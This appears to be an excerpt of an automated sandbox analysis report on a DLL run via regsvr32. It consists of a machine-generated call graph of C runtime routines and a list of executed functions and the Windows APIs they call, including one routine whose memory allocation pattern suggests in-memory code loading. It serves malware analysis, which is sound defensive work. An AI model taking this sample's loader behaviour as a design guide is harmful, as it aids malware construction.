18106->18107 18108 1002e943 18106->18108 18110 1002e89b 18107->18110 18114 1002e92d 18107->18114 18275 10030912 18107->18275 18112 1002e9a1 18108->18112 18113 1002e948 18108->18113 18110->18093 18112->18110 18307 100348b9 18112->18307 18278 1003459f TlsGetValue 18113->18278 18114->18110 18121 10036caa __ioterm 50 API calls 18114->18121 18124 1002e937 18121->18124 18122 1002e8a7 __RTC_Initialize 18125 1002e8ab 18122->18125 18130 1002e8b7 GetCommandLineA 18122->18130 18126 100345d3 __mtterm 52 API calls 18124->18126 18253 10035675 18125->18253 18129 1002e93c 18126->18129 18128 10034524 __decode_pointer 6 API calls 18131 1002e977 18128->18131 18132 10035675 __heap_term 4 API calls 18129->18132 18191 1003702b 18130->18191 18137 1002e995 18131->18137 18138 1002e97e 18131->18138 18132->18110 18136 1002e8d1 18139 1002e8dc __setargv 18136->18139 18148 1002e8d5 18136->18148 18141 1002e577 ___init_ctype 49 API calls 18137->18141 18289 10034610 18138->18289 18143 1002e8e5 18139->18143 18150 1002e8f5 18139->18150 18141->18110 18233 10036cf8 18143->18233 18144 1002e985 GetCurrentThreadId 18144->18110 18259 100345d3 18148->18259 18150->18110 18270 10036caa 18150->18270 18152 1000809c 18151->18152 18765 10008000 18152->18765 18156 1002e896 18155->18156 18156->18110 18157 10034927 GetModuleHandleW 18156->18157 18158 10034942 18157->18158 18159 1003493b 18157->18159 18161 10034aaa 18158->18161 18162 1003494c GetProcAddress GetProcAddress GetProcAddress GetProcAddress 18158->18162 18160 1003065c __crt_waiting_on_module_handle 2 API calls 18159->18160 18164 10034941 18160->18164 18163 100345d3 __mtterm 52 API calls 18161->18163 18165 10034995 TlsAlloc 18162->18165 18167 10034aaf 18163->18167 18164->18158 18165->18167 18168 100349e3 TlsSetValue 18165->18168 18167->18122 18168->18167 18169 100349f4 18168->18169 18318 10030921 18169->18318 18172 100344a9 __encode_pointer 6 API calls 18173 10034a04 18172->18173 18174 100344a9 __encode_pointer 6 API calls 18173->18174 18175 10034a14 18174->18175 18176 100344a9 __encode_pointer 6 API calls 18175->18176 18177 10034a24 18176->18177 18178 100344a9 __encode_pointer 6 API calls 18177->18178 18179 10034a34 18178->18179 18325 100356e9 18179->18325 18182 10034524 __decode_pointer 6 API calls 18183 10034a55 18182->18183 18183->18161 18184 100351f3 __calloc_crt 51 API calls 18183->18184 18185 10034a6e 18184->18185 18185->18161 18186 10034524 __decode_pointer 6 API calls 18185->18186 18187 10034a88 18186->18187 18187->18161 18188 10034a8f 18187->18188 18189 10034610 __mtinit 61 API calls 18188->18189 18190 10034a97 GetCurrentThreadId 18189->18190 18190->18167 18192 10037049 GetEnvironmentStringsW 18191->18192 18199 10037068 18191->18199 18193 10037051 18192->18193 18194 1003705d GetLastError 18192->18194 18197 10037093 WideCharToMultiByte 18193->18197 18198 10037084 GetEnvironmentStringsW 18193->18198 18194->18199 18195 10037101 18196 1003710a GetEnvironmentStrings 18195->18196 18200 1002e8c7 18195->18200 18196->18200 18201 1003711a 18196->18201 18204 100370c7 18197->18204 18205 100370f6 FreeEnvironmentStringsW 18197->18205 18198->18197 18198->18200 18199->18193 18199->18195 18218 10036a56 18200->18218 18206 100351ae __malloc_crt 49 API calls 18201->18206 18207 100351ae __malloc_crt 49 API calls 18204->18207 18205->18200 18208 10037134 18206->18208 18209 100370cd 18207->18209 18210 10037147 18208->18210 18211 1003713b FreeEnvironmentStringsA 18208->18211 18209->18205 18212 100370d5 WideCharToMultiByte 18209->18212 18213 1002db20 ___init_ctype __VEC_memcpy 18210->18213 18211->18200 18214 100370ef 18212->18214 18215 100370e7 18212->18215 18216 10037151 FreeEnvironmentStringsA 18213->18216 18214->18205 18217 1002e577 ___init_ctype 49 API calls 18215->18217 18216->18200 18217->18214 18219 10030e38 18218->18219 18220 10036a62 GetStartupInfoA 18219->18220 18221 100351f3 __calloc_crt 51 API calls 18220->18221 18222 10036a83 18221->18222 18223 10036ca1 18222->18223 18224 10036be8 18222->18224 18227 100351f3 __calloc_crt 51 API calls 18222->18227 18230 10036b6b 18222->18230 18223->18136 18224->18223 18225 10036c1e GetStdHandle 18224->18225 18226 10036c83 SetHandleCount 18224->18226 18228 10036c30 GetFileType 18224->18228 18231 100386ab ___lock_fhandle InitializeCriticalSectionAndSpinCount 18224->18231 18225->18224 18226->18223 18227->18222 18228->18224 18229 10036b94 GetFileType 18229->18230 18230->18223 18230->18224 18230->18229 18232 100386ab ___lock_fhandle InitializeCriticalSectionAndSpinCount 18230->18232 18231->18224 18232->18230 18234 10036d01 18233->18234 18237 10036d06 _strlen 18233->18237 18332 100334dc 18234->18332 18236 100351f3 __calloc_crt 51 API calls 18242 10036d3b _strcpy_s _strlen 18236->18242 18237->18236 18240 1002e8ea 18237->18240 18238 10036d99 18239 1002e577 ___init_ctype 49 API calls 18238->18239 18239->18240 18240->18150 18247 1003074b 18240->18247 18241 100351f3 __calloc_crt 51 API calls 18241->18242 18242->18238 18242->18240 18242->18241 18243 10036dbf 18242->18243 18245 10036d80 18242->18245 18244 1002e577 ___init_ctype 49 API calls 18243->18244 18244->18240 18245->18242 18246 10032cb9 __invoke_watson 10 API calls 18245->18246 18246->18245 18250 10030759 __IsNonwritableInCurrentImage 18247->18250 18249 10030777 __initterm_e 18252 10030796 __IsNonwritableInCurrentImage __initterm 18249->18252 18429 1002e391 18249->18429 18425 1003817c 18250->18425 18252->18150 18254 100356d5 HeapDestroy 18253->18254 18255 1003567e 18253->18255 18254->18110 18256 100356c3 HeapFree 18255->18256 18257 1003569a VirtualFree HeapFree 18255->18257 18256->18254 18257->18257 18258 100356c2 18257->18258 18258->18256 18260 100345dd 18259->18260 18263 100345e9 18259->18263 18261 10034524 __decode_pointer 6 API calls 18260->18261 18261->18263 18262 100345fd TlsFree 18264 1003460b 18262->18264 18263->18262 18263->18264 18265 10035750 DeleteCriticalSection 18264->18265 18266 10035768 18264->18266 18267 1002e577 ___init_ctype 49 API calls 18265->18267 18268 1003577a DeleteCriticalSection 18266->18268 18269 10035788 18266->18269 18267->18264 18268->18266 18269->18125 18272 10036cb3 18270->18272 18271 10036cf5 18271->18148 18272->18271 18273 10036cc7 DeleteCriticalSection 18272->18273 18274 1002e577 ___init_ctype 49 API calls 18272->18274 18273->18272 18274->18272 18519 100307d0 18275->18519 18277 1003091d 18277->18114 18279 100345b4 18278->18279 18280 1002e94d 18278->18280 18281 10034524 __decode_pointer 6 API calls 18279->18281 18283 100351f3 18280->18283 18282 100345bf TlsSetValue 18281->18282 18282->18280 18285 100351fc 18283->18285 18286 1002e959 18285->18286 18287 1003521a Sleep 18285->18287 18542 1003b872 18285->18542 18286->18110 18286->18128 18288 1003522f 18287->18288 18288->18285 18288->18286 18290 10030e38 18289->18290 18291 1003461c GetModuleHandleW 18290->18291 18292 10034632 18291->18292 18293 1003462c 18291->18293 18295 1003464a GetProcAddress GetProcAddress 18292->18295 18296 1003466e 18292->18296 18294 1003065c __crt_waiting_on_module_handle 2 API calls 18293->18294 18294->18292 18295->18296 18297 10035865 __lock 49 API calls 18296->18297 18298 1003468d InterlockedIncrement 18297->18298 18554 100346e5 18298->18554 18301 10035865 __lock 49 API calls 18302 100346ae 18301->18302 18557 10033643 InterlockedIncrement 18302->18557 18304 100346cc 18569 100346ee 18304->18569 18306 100346d9 18306->18144 18308 10034912 18307->18308 18309 100348c7 18307->18309 18312 10034925 18308->18312 18313 1003491c TlsSetValue 18308->18313 18310 100348f0 18309->18310 18311 100348cd TlsGetValue 18309->18311 18315 10034524 __decode_pointer 6 API calls 18310->18315 18311->18310 18314 100348e0 TlsGetValue 18311->18314 18312->18110 18313->18312 18314->18310 18316 10034907 18315->18316 18574 1003478a 18316->18574 18319 1003451b ___crtMessageBoxW 6 API calls 18318->18319 18320 10030929 __init_pointers __initp_misc_winsig 18319->18320 18329 10038115 18320->18329 18323 100344a9 __encode_pointer 6 API calls 18324 10030965 18323->18324 18324->18172 18326 100356f4 18325->18326 18327 10034a41 18326->18327 18328 100386ab ___lock_fhandle InitializeCriticalSectionAndSpinCount 18326->18328 18327->18161 18327->18182 18328->18326 18330 100344a9 __encode_pointer 6 API calls 18329->18330 18331 1003095b 18330->18331 18331->18323 18333 100334ec 18332->18333 18334 100334e5 18332->18334 18333->18237 18336 10033342 18334->18336 18337 1003334e 18336->18337 18365 10034770 18337->18365 18341 10033361 18386 100330e1 _LocaleUpdate::_LocaleUpdate 18341->18386 18344 100351ae __malloc_crt 49 API calls 18345 10033382 18344->18345 18353 100334a1 18345->18353 18391 1003315d 18345->18391 18348 100333b2 InterlockedDecrement 18350 100333d3 InterlockedIncrement 18348->18350 18351 100333c2 18348->18351 18349 100334ae 18349->18353 18355 1002e577 ___init_ctype 49 API calls 18349->18355 18352 100333e9 18350->18352 18350->18353 18351->18350 18354 1002e577 ___init_ctype 49 API calls 18351->18354 18352->18353 18357 10035865 __lock 49 API calls 18352->18357 18353->18333 18356 100333d2 18354->18356 18355->18353 18356->18350 18359 100333fd InterlockedDecrement 18357->18359 18360 1003348c InterlockedIncrement 18359->18360 18361 10033479 18359->18361 18403 100334a3 18360->18403 18361->18360 18363 1002e577 ___init_ctype 49 API calls 18361->18363 18364 1003348b 18363->18364 18364->18360 18406 100346f7 GetLastError 18365->18406 18367 10034778 18368 10033357 18367->18368 18369 1003068c __amsg_exit 31 API calls 18367->18369 18370 1003303d 18368->18370 18369->18368 18371 10033049 18370->18371 18372 10034770 __getptd 68 API calls 18371->18372 18373 1003304e 18372->18373 18374 10033060 18373->18374 18375 10035865 __lock 49 API calls 18373->18375 18378 1003306e 18374->18378 18382 1003068c __amsg_exit 31 API calls 18374->18382 18376 1003307e 18375->18376 18377 100330c7 18376->18377 18379 10033095 InterlockedDecrement 18376->18379 18380 100330af InterlockedIncrement 18376->18380 18420 100330d8 18377->18420 18378->18341 18379->18380 18383 100330a0 18379->18383 18380->18377 18382->18378 18383->18380 18384 1002e577 ___init_ctype 49 API calls 18383->18384 18385 100330ae 18384->18385 18385->18380 18387 10033100 GetOEMCP 18386->18387 18388 1003311e 18386->18388 18390 10033110 18387->18390 18389 10033123 GetACP 18388->18389 18388->18390 18389->18390 18390->18344 18390->18353 18392 100330e1 getSystemCP 3 API calls 18391->18392 18396 1003317d 18392->18396 18393 10033188 setSBCS 18394 10033330 18393->18394 18395 1002db0d __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 18394->18395 18397 10033340 18395->18397 18396->18393 18396->18394 18398 100331cc IsValidCodePage 18396->18398 18401 100331f1 _memset 18396->18401 18397->18348 18397->18349 18398->18394 18399 100331de GetCPInfo 18398->18399 18400 10033324 18399->18400 18399->18401 18400->18393 18400->18394 18402 100332cc setSBUpLow 18401->18402 18402->18401 18424 1003578b LeaveCriticalSection 18403->18424 18405 100334aa 18405->18353 18407 1003459f ___set_flsgetvalue 8 API calls 18406->18407 18408 1003470e 18407->18408 18409 10034764 SetLastError 18408->18409 18410 100351f3 __calloc_crt 51 API calls 18408->18410 18409->18367 18411 10034722 18410->18411 18411->18409 18412 10034524 __decode_pointer 6 API calls 18411->18412 18413 1003473c 18412->18413 18414 10034743 18413->18414 18415 1003475b 18413->18415 18416 10034610 __mtinit 61 API calls 18414->18416 18417 1002e577 ___init_ctype 49 API calls 18415->18417 18418 1003474b GetCurrentThreadId 18416->18418 18419 10034761 18417->18419 18418->18409 18419->18409 18423 1003578b LeaveCriticalSection 18420->18423 18422 100330df 18422->18374 18423->18422 18424->18405 18426 10038182 18425->18426 18427 100344a9 __encode_pointer 6 API calls 18426->18427 18428 1003819a 18426->18428 18427->18426 18428->18249 18432 1002e355 18429->18432 18431 1002e39e 18431->18252 18433 1002e361 18432->18433 18440 100306f8 18433->18440 18439 1002e382 18439->18431 18441 10035865 __lock 49 API calls 18440->18441 18442 1002e366 18441->18442 18443 1002e26a 18442->18443 18444 10034524 __decode_pointer 6 API calls 18443->18444 18445 1002e27e 18444->18445 18446 10034524 __decode_pointer 6 API calls 18445->18446 18447 1002e28e 18446->18447 18448 1002e311 18447->18448 18466 100317be 18447->18466 18463 1002e38b 18448->18463 18450 1002e2ac 18451 1002e2f8 18450->18451 18454 1002e2d6 18450->18454 18455 1002e2c7 18450->18455 18452 100344a9 __encode_pointer 6 API calls 18451->18452 18453 1002e306 18452->18453 18456 100344a9 __encode_pointer 6 API calls 18453->18456 18454->18448 18458 1002e2d0 18454->18458 18474 1003523f 18455->18474 18456->18448 18458->18454 18459 1003523f __realloc_crt 57 API calls 18458->18459 18460 1002e2ec 18458->18460 18461 1002e2e6 18459->18461 18462 100344a9 __encode_pointer 6 API calls 18460->18462 18461->18448 18461->18460 18462->18451 18515 10030701 18463->18515 18468 100317ca 18466->18468 18467 100317da 18467->18450 18468->18467 18469 10031838 HeapSize 18468->18469 18470 10035865 __lock 49 API calls 18468->18470 18469->18467 18471 10031807 ___sbh_find_block 18470->18471 18479 10031858 18471->18479 18478 10035248 18474->18478 18476 10035287 18476->18458 18477 10035268 Sleep 18477->18478 18478->18476 18478->18477 18483 1003102c 18478->18483 18482 1003578b LeaveCriticalSection 18479->18482 18481 10031833 18481->18467 18481->18469 18482->18481 18484 10031038 18483->18484 18485 1003103f 18484->18485 18486 1003104d 18484->18486 18487 1002e654 _malloc 49 API calls 18485->18487 18488 10031060 18486->18488 18489 10031054 18486->18489 18506 10031047 _realloc 18487->18506 18495 100311d2 18488->18495 18505 1003106d ___sbh_find_block 18488->18505 18490 1002e577 ___init_ctype 49 API calls 18489->18490 18490->18506 18491 10031205 18494 1003654f _malloc 6 API calls 18491->18494 18492 10035865 __lock 49 API calls 18492->18505 18493 100311d7 HeapReAlloc 18493->18495 18493->18506 18494->18506 18495->18491 18495->18493 18496 100311b8 18495->18496 18497 1003654f _malloc 6 API calls 18495->18497 18510 1003119b 18495->18510 18500 10031232 GetLastError 18496->18500 18496->18506 18497->18495 18499 100310a0 ___sbh_resize_block 18499->18505 18500->18506 18501 100310f8 HeapAlloc 18501->18505 18502 10036077 ___sbh_alloc_block 5 API calls 18502->18505 18503 1003114d HeapReAlloc 18503->18505 18504 100311a5 GetLastError 18504->18506 18505->18491 18505->18492 18505->18496 18505->18499 18505->18501 18505->18502 18505->18503 18505->18506 18507 1002db20 __VEC_memcpy ___init_ctype 18505->18507 18508 1003654f _malloc 6 API calls 18505->18508 18509 100358c8 VirtualFree VirtualFree HeapFree ___sbh_free_block 18505->18509 18505->18510 18511 10031170 18505->18511 18506->18478 18507->18505 18508->18505 18509->18505 18510->18504 18510->18506 18514 1003578b LeaveCriticalSection 18511->18514 18513 10031177 18513->18505 18514->18513 18518 1003578b LeaveCriticalSection 18515->18518 18517 1002e390 18517->18439 18518->18517 18520 100307dc 18519->18520 18521 10035865 __lock 49 API calls 18520->18521 18522 100307e3 18521->18522 18524 10034524 __decode_pointer 6 API calls 18522->18524 18528 1003089c __initterm 18522->18528 18527 1003081a 18524->18527 18525 100308e4 18525->18277 18527->18528 18530 10034524 __decode_pointer 6 API calls 18527->18530 18536 100308e7 18528->18536 18535 1003082f 18530->18535 18531 100308db 18532 100306e0 _malloc 3 API calls 18531->18532 18532->18525 18533 1003451b 6 API calls ___crtMessageBoxW 18533->18535 18534 10034524 6 API calls __decode_pointer 18534->18535 18535->18528 18535->18533 18535->18534 18537 100308c8 18536->18537 18538 100308ed 18536->18538 18537->18525 18540 1003578b LeaveCriticalSection 18537->18540 18541 1003578b LeaveCriticalSection 18538->18541 18540->18531 18541->18537 18543 1003b87e _memset 18542->18543 18544 1003b927 RtlAllocateHeap 18543->18544 18545 1003654f _malloc 6 API calls 18543->18545 18546 10035865 __lock 49 API calls 18543->18546 18547 1003b896 18543->18547 18548 10036077 ___sbh_alloc_block 5 API calls 18543->18548 18550 1003b96e 18543->18550 18544->18543 18545->18543 18546->18543 18547->18285 18548->18543 18553 1003578b LeaveCriticalSection 18550->18553 18552 1003b975 18552->18543 18553->18552 18572 1003578b LeaveCriticalSection 18554->18572 18556 100346a7 18556->18301 18558 10033661 InterlockedIncrement 18557->18558 18559 10033664 18557->18559 18558->18559 18560 10033671 18559->18560 18561 1003366e InterlockedIncrement 18559->18561 18562 1003367b InterlockedIncrement 18560->18562 18563 1003367e 18560->18563 18561->18560 18562->18563 18564 10033688 InterlockedIncrement 18563->18564 18566 1003368b 18563->18566 18564->18566 18565 100336a4 InterlockedIncrement 18565->18566 18566->18565 18567 100336b4 InterlockedIncrement 18566->18567 18568 100336bf InterlockedIncrement 18566->18568 18567->18566 18568->18304 18573 1003578b LeaveCriticalSection 18569->18573 18571 100346f5 18571->18306 18572->18556 18573->18571 18575 10034796 18574->18575 18576 100347ae 18575->18576 18577 10034898 18575->18577 18578 1002e577 ___init_ctype 49 API calls 18575->18578 18579 100347bc 18576->18579 18580 1002e577 ___init_ctype 49 API calls 18576->18580 18577->18308 18578->18576 18581 100347ca 18579->18581 18583 1002e577 ___init_ctype 49 API calls 18579->18583 18580->18579 18582 100347d8 18581->18582 18584 1002e577 ___init_ctype 49 API calls 18581->18584 18585 100347e6 18582->18585 18586 1002e577 ___init_ctype 49 API calls 18582->18586 18583->18581 18584->18582 18587 100347f4 18585->18587 18588 1002e577 ___init_ctype 49 API calls 18585->18588 18586->18585 18589 10034802 18587->18589 18591 1002e577 ___init_ctype 49 API calls 18587->18591 18588->18587 18590 10034813 18589->18590 18592 1002e577 ___init_ctype 49 API calls 18589->18592 18593 10035865 __lock 49 API calls 18590->18593 18591->18589 18592->18590 18594 1003481b 18593->18594 18595 10034827 InterlockedDecrement 18594->18595 18602 10034840 18594->18602 18597 10034832 18595->18597 18595->18602 18599 1002e577 ___init_ctype 49 API calls 18597->18599 18597->18602 18599->18602 18600 10035865 __lock 49 API calls 18601 10034854 18600->18601 18603 10034885 18601->18603 18613 100336d2 18601->18613 18610 100348a4 18602->18610 18656 100348b0 18603->18656 18607 1002e577 ___init_ctype 49 API calls 18607->18577 18659 1003578b LeaveCriticalSection 18610->18659 18612 1003484d 18612->18600 18614 100336e3 InterlockedDecrement 18613->18614 18615 10033766 18613->18615 18616 100336fb 18614->18616 18617 100336f8 InterlockedDecrement 18614->18617 18615->18603 18627 100334fa 18615->18627 18618 10033705 InterlockedDecrement 18616->18618 18619 10033708 18616->18619 18617->18616 18618->18619 18620 10033712 InterlockedDecrement 18619->18620 18621 10033715 18619->18621 18620->18621 18622 1003371f InterlockedDecrement 18621->18622 18624 10033722 18621->18624 18622->18624 18623 1003373b InterlockedDecrement 18623->18624 18624->18623 18625 1003374b InterlockedDecrement 18624->18625 18626 10033756 InterlockedDecrement 18624->18626 18625->18624 18626->18615 18634 10033511 18627->18634 18654 1003357e 18627->18654 18628 100335cb 18648 100335f2 18628->18648 18676 1003cbed 18628->18676 18629 1002e577 ___init_ctype 49 API calls 18632 1003359f 18629->18632 18631 10033545 18636 10033568 18631->18636 18647 1002e577 ___init_ctype 49 API calls 18631->18647 18635 1002e577 ___init_ctype 49 API calls 18632->18635 18634->18631 18639 1002e577 ___init_ctype 49 API calls 18634->18639 18634->18654 18640 100335b2 18635->18640 18641 1002e577 ___init_ctype 49 API calls 18636->18641 18637 1002e577 ___init_ctype 49 API calls 18637->18648 18638 10033637 18643 1002e577 ___init_ctype 49 API calls 18638->18643 18644 1003353a 18639->18644 18645 1002e577 ___init_ctype 49 API calls 18640->18645 18642 10033573 18641->18642 18649 1002e577 ___init_ctype 49 API calls 18642->18649 18650 1003363d 18643->18650 18660 1003d00a 18644->18660 18652 100335c0 18645->18652 18646 1002e577 49 API calls ___init_ctype 18646->18648 18653 1003355b ___free_lconv_num 18647->18653 18648->18638 18648->18646 18649->18654 18650->18603 18655 1002e577 ___init_ctype 49 API calls 18652->18655 18653->18636 18654->18628 18654->18629 18655->18628 18764 1003578b LeaveCriticalSection 18656->18764 18658 10034892 18658->18607 18659->18612 18661 1003d094 18660->18661 18662 1003d017 18660->18662 18661->18631 18663 1003d028 18662->18663 18664 1002e577 ___init_ctype 49 API calls 18662->18664 18665 1003d03a 18663->18665 18666 1002e577 ___init_ctype 49 API calls 18663->18666 18664->18663 18667 1003d04c 18665->18667 18668 1002e577 ___init_ctype 49 API calls 18665->18668 18666->18665 18669 1003d05e 18667->18669 18670 1002e577 ___init_ctype 49 API calls 18667->18670 18668->18667 18671 1003d070 18669->18671 18672 1002e577 ___init_ctype 49 API calls 18669->18672 18670->18669 18673 1003d082 18671->18673 18674 1002e577 ___init_ctype 49 API calls 18671->18674 18672->18671 18673->18661 18675 1002e577 ___init_ctype 49 API calls 18673->18675 18674->18673 18675->18661 18677 100335eb 18676->18677 18678 1003cbfe 18676->18678 18677->18637 18679 1002e577 ___init_ctype 49 API calls 18678->18679 18680 1003cc06 18679->18680 18681 1002e577 ___init_ctype 49 API calls 18680->18681 18682 1003cc0e 18681->18682 18683 1002e577 ___init_ctype 49 API calls 18682->18683 18684 1003cc16 18683->18684 18685 1002e577 ___init_ctype 49 API calls 18684->18685 18686 1003cc1e 18685->18686 18687 1002e577 ___init_ctype 49 API calls 18686->18687 18688 1003cc26 18687->18688 18689 1002e577 ___init_ctype 49 API calls 18688->18689 18690 1003cc2e 18689->18690 18691 1002e577 ___init_ctype 49 API calls 18690->18691 18692 1003cc35 18691->18692 18693 1002e577 ___init_ctype 49 API calls 18692->18693 18694 1003cc3d 18693->18694 18695 1002e577 ___init_ctype 49 API calls 18694->18695 18696 1003cc45 18695->18696 18697 1002e577 ___init_ctype 49 API calls 18696->18697 18698 1003cc4d 18697->18698 18699 1002e577 ___init_ctype 49 API calls 18698->18699 18700 1003cc55 18699->18700 18701 1002e577 ___init_ctype 49 API calls 18700->18701 18702 1003cc5d 18701->18702 18703 1002e577 ___init_ctype 49 API calls 18702->18703 18704 1003cc65 18703->18704 18705 1002e577 ___init_ctype 49 API calls 18704->18705 18706 1003cc6d 18705->18706 18707 1002e577 ___init_ctype 49 API calls 18706->18707 18708 1003cc75 18707->18708 18709 1002e577 ___init_ctype 49 API calls 18708->18709 18710 1003cc7d 18709->18710 18711 1002e577 ___init_ctype 49 API calls 18710->18711 18712 1003cc88 18711->18712 18713 1002e577 ___init_ctype 49 API calls 18712->18713 18714 1003cc90 18713->18714 18715 1002e577 ___init_ctype 49 API calls 18714->18715 18716 1003cc98 18715->18716 18717 1002e577 ___init_ctype 49 API calls 18716->18717 18718 1003cca0 18717->18718 18719 1002e577 ___init_ctype 49 API calls 18718->18719 18720 1003cca8 18719->18720 18721 1002e577 ___init_ctype 49 API calls 18720->18721 18722 1003ccb0 18721->18722 18723 1002e577 ___init_ctype 49 API calls 18722->18723 18724 1003ccb8 18723->18724 18725 1002e577 ___init_ctype 49 API calls 18724->18725 18726 1003ccc0 18725->18726 18727 1002e577 ___init_ctype 49 API calls 18726->18727 18728 1003ccc8 18727->18728 18729 1002e577 ___init_ctype 49 API calls 18728->18729 18730 1003ccd0 18729->18730 18731 1002e577 ___init_ctype 49 API calls 18730->18731 18732 1003ccd8 18731->18732 18733 1002e577 ___init_ctype 49 API calls 18732->18733 18734 1003cce0 18733->18734 18735 1002e577 ___init_ctype 49 API calls 18734->18735 18736 1003cce8 18735->18736 18737 1002e577 ___init_ctype 49 API calls 18736->18737 18738 1003ccf0 18737->18738 18739 1002e577 ___init_ctype 49 API calls 18738->18739 18740 1003ccf8 18739->18740 18741 1002e577 ___init_ctype 49 API calls 18740->18741 18742 1003cd00 18741->18742 18743 1002e577 ___init_ctype 49 API calls 18742->18743 18744 1003cd0e 18743->18744 18745 1002e577 ___init_ctype 49 API calls 18744->18745 18746 1003cd19 18745->18746 18747 1002e577 ___init_ctype 49 API calls 18746->18747 18748 1003cd24 18747->18748 18749 1002e577 ___init_ctype 49 API calls 18748->18749 18750 1003cd2f 18749->18750 18751 1002e577 ___init_ctype 49 API calls 18750->18751 18752 1003cd3a 18751->18752 18753 1002e577 ___init_ctype 49 API calls 18752->18753 18754 1003cd45 18753->18754 18755 1002e577 ___init_ctype 49 API calls 18754->18755 18756 1003cd50 18755->18756 18757 1002e577 ___init_ctype 49 API calls 18756->18757 18758 1003cd5b 18757->18758 18759 1002e577 ___init_ctype 49 API calls 18758->18759 18760 1003cd66 18759->18760 18761 1002e577 ___init_ctype 49 API calls 18760->18761 18762 1003cd71 18761->18762 18763 1002e577 ___init_ctype 49 API calls 18762->18763 18763->18677 18764->18658 18766 1002e654 _malloc 49 API calls 18765->18766 18767 10008010 18766->18767 18768 1000801c 18767->18768 18769 1002e577 ___init_ctype 49 API calls 18767->18769 18769->18768

                                                                                                          Executed Functions

                                                                                                          Function 10002D40, Relevance: 22.8, APIs: 15, Instructions: 331COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 7 10002d40-10002d67 call 100024a0 10 10002d70-10002d81 7->10 11 10002d69-10002d6b 7->11 13 10002d83-10002d90 SetLastError 10->13 14 10002d95-10002db0 call 100024a0 10->14 12 1000315a-1000315d 11->12 13->12 17 10002db2-10002db4 14->17 18 10002db9-10002dce 14->18 17->12 19 10002dd0-10002ddd SetLastError 18->19 20 10002de2-10002def 18->20 19->12 21 10002df1-10002dfe SetLastError 20->21 22 10002e03-10002e0c 20->22 21->12 23 10002e20-10002e41 22->23 24 10002e0e-10002e1b SetLastError 22->24 25 10002e55-10002e5f 23->25 24->12 26 10002e61-10002e68 25->26 27 10002e97-10002ed2 GetNativeSystemInfo 25->27 28 10002e78-10002e84 26->28 29 10002e6a-10002e76 26->29 30 10002ed4-10002ee1 SetLastError 27->30 31 10002ee6-10002f05 VirtualAlloc 27->31 32 10002e87-10002e8d 28->32 29->32 30->12 33 10002f32-10002f4a GetProcessHeap HeapAlloc 31->33 34 10002f07-10002f21 VirtualAlloc 31->34 38 10002e95 32->38 39 10002e8f-10002e92 32->39 36 10002f6c-10002fd0 call 100024a0 33->36 37 10002f4c-10002f67 VirtualFree SetLastError 33->37 34->33 35 10002f23-10002f2d SetLastError 34->35 35->12 43 10002fd2 36->43 44 10002fdc-10003041 VirtualAlloc call 10002320 call 100024d0 36->44 37->12 38->25 39->38 45 1000314c-10003158 call 10003310 43->45 52 10003043 44->52 53 1000304d-1000305e 44->53 45->12 52->45 54 10003060-10003076 call 100029c0 53->54 55 10003078-1000307b 53->55 56 10003082-10003090 call 10002ab0 54->56 55->56 61 10003092 56->61 62 1000309c-100030aa call 100027c0 56->62 61->45 65 100030b6-100030c4 call 10002940 62->65 66 100030ac 62->66 69 100030c6 65->69 70 100030cd-100030d6 65->70 66->45 69->45 71 100030d8-100030df 70->71 72 1000313d-10003140 70->72 73 100030e1-10003102 71->73 74 1000312a-10003138 71->74 75 10003147-1000314a 72->75 77 10003106-1000310d 73->77 76 1000313b 74->76 75->12 75->45 76->75 78 1000311e-10003128 77->78 79 1000310f-1000311a SetLastError 77->79 78->76 79->45
                                                                                                          APIs
                                                                                                            • Part of subcall function 100024A0: SetLastError.KERNEL32(0000000D,?,?,10002D65,1001DF0A,00000040), ref: 100024B1
                                                                                                          • SetLastError.KERNEL32(000000C1,1001DF0A,00000040), ref: 10002D88
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670549584.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670541372.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670611644.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670619699.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670625265.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670649680.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670654366.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670659647.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLast
                                                                                                          • String ID:
                                                                                                          • API String ID: 1452528299-0
                                                                                                          • Opcode ID: 6650c2dd50d65ac3f23d73d252b9ed4773b7d6bfb551cac519879840267a53eb
                                                                                                          • Instruction ID: 8eda3ac1f8f3e078098bdc719848e1594ce6d4798074e02e4610946cd2a58ef5
                                                                                                          • Opcode Fuzzy Hash: 6650c2dd50d65ac3f23d73d252b9ed4773b7d6bfb551cac519879840267a53eb
                                                                                                          • Instruction Fuzzy Hash: 7CE1E774A00209DFEB05CF94C994AAEB7B6FF8C344F208559E909AB399D770ED42CB54
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 1002ADAC, Relevance: 16.6, APIs: 11, Instructions: 106memoryCOMMONLIBRARYCODE
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          • EnterCriticalSection.KERNEL32(100863DC,?,?,?,100863C0,100863C0,?,1002B10F,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002ADBF
                                                                                                          • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,100863C0,100863C0,?,1002B10F,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004), ref: 1002AE15
                                                                                                          • GlobalHandle.KERNEL32 ref: 1002AE1E
                                                                                                          • GlobalUnlock.KERNEL32(00000000,?,?,?,100863C0,100863C0,?,1002B10F,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002AE28
                                                                                                          • GlobalReAlloc.KERNEL32(?,00000000,00002002), ref: 1002AE41
